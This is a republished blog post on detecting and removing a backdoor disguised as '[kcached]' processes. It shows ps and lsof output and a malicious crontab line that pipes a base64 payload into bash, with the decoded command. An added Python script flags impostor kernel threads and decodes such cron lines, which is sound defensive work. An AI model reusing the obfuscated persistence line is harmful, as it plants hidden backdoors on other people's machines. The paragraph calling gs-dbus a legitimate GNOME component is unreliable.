This content originally appeared on DEV Community and was authored by Henri Sekeladi
https://alltime.pp.ua/blog/how-to-deal-with-malicious-kcached-processes/
If you find processes like the ones below on your server, you can be sure you have detected malicious activity.
username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]
You can use the lsof command to determine which processes have the files open and whether they are being used for legitimate purposes. If you are unsure about the legitimacy of these files or the processes using them, it may be helpful to consult with a qualified system administrator or security expert.
root@server1 [~]# lsof -p 2156075
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus
Listing the files the process runs from:
ls -1 /home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat
The files you see appear to be related to the gs-dbus process, which is a component of the GNOME software suite that manages D-Bus connections for graphical applications. The files in question are likely configuration files and data files used by this process.
It is not uncommon for these types of files to be owned by a user, especially if they are related to user-specific settings or configurations.
Inspect the crontab of the affected user:
root@server1 [~]# crontab -lu username
# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel
Decoding the base64 payload reveals the actual command:
/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null
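The two checks above, turned into a small triage script (added example, not part of the original post): a process whose argv[0] is dressed up as a bracketed kernel-thread name but that still has a cmdline and an exe link is an impostor, and a cron line of the form `echo <base64> | base64 -d | bash` is decoded so you can read what it runs. The process records and the control rows (PID 2, sshd) are constructed; the PIDs, paths and cron line come from the page.

```python
import base64
import os
import re
# Constructed process records mirroring this page's ps/lsof output (PIDs and
# paths from the page; the kernel-thread and sshd rows are made-up controls).
SAMPLE_PROCS = [
    {"pid": 2156075, "argv0": "[kcached]", "exe": "/home/username/.config/dbus/gs-dbus"},
    {"pid": 2156076, "argv0": "[kcached]", "exe": "/home/username/.config/dbus/gs-dbus"},
    {"pid": 2, "argv0": "", "exe": None},  # genuine kernel thread: no cmdline, no exe link
    {"pid": 1234, "argv0": "/usr/sbin/sshd", "exe": "/usr/sbin/sshd"},
]

def is_fake_kernel_thread(proc):
    """Genuine kernel threads have an empty cmdline and no /proc/PID/exe target.
    `exec -a '[kcached]'` only rewrites argv[0], so the impostor still has a
    cmdline and a readable exe link: that combination is the tell."""
    argv0 = proc["argv0"]
    return argv0.startswith("[") and argv0.endswith("]") and proc["exe"] is not None

def suspicious_pids(procs):
    return [p["pid"] for p in procs if is_fake_kernel_thread(p)]

def read_proc(proc_root="/proc"):
    """Build the same records from a live /proc. Run as root: readlink on another
    user's /proc/PID/exe fails with EACCES otherwise and mimics a kernel thread."""
    procs = []
    if not os.path.isdir(proc_root):
        return procs
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(f"{proc_root}/{name}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
        except OSError:
            continue  # process exited mid-scan
        try:
            exe = os.readlink(f"{proc_root}/{name}/exe")
        except OSError:
            exe = None
        procs.append({"pid": int(name), "argv0": argv0, "exe": exe})
    return procs

# The crontab entry shown on this page, verbatim.
CRON_LINE = "0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel"
# `echo <base64> | base64 -d | sh` is how the entry hides its real command; decode it for review.
B64_TO_SHELL = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh\b")

def decode_cron_payload(line):
    m = B64_TO_SHELL.search(line)
    return base64.b64decode(m.group(1)).decode(errors="replace") if m else None
```

On the sample, only the two `[kcached]` rows are flagged; on a live box, feed `read_proc()` to `suspicious_pids()` and run `decode_cron_payload()` over each user's `crontab -l` output.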
Recommendations:
– Don't ignore the finding
– kill the processes
– remove the files
– remove the cron entry
– reset all passwords for the affected user
– additionally scan the account with a good malware scanner
– notify the client
Henri Sekeladi | Sciencx (2024-09-10T02:06:53+00:00) How to deal with malicious kcached processes. Retrieved from https://www.scien.cx/2024/09/10/how-to-deal-with-malicious-kcached-processes/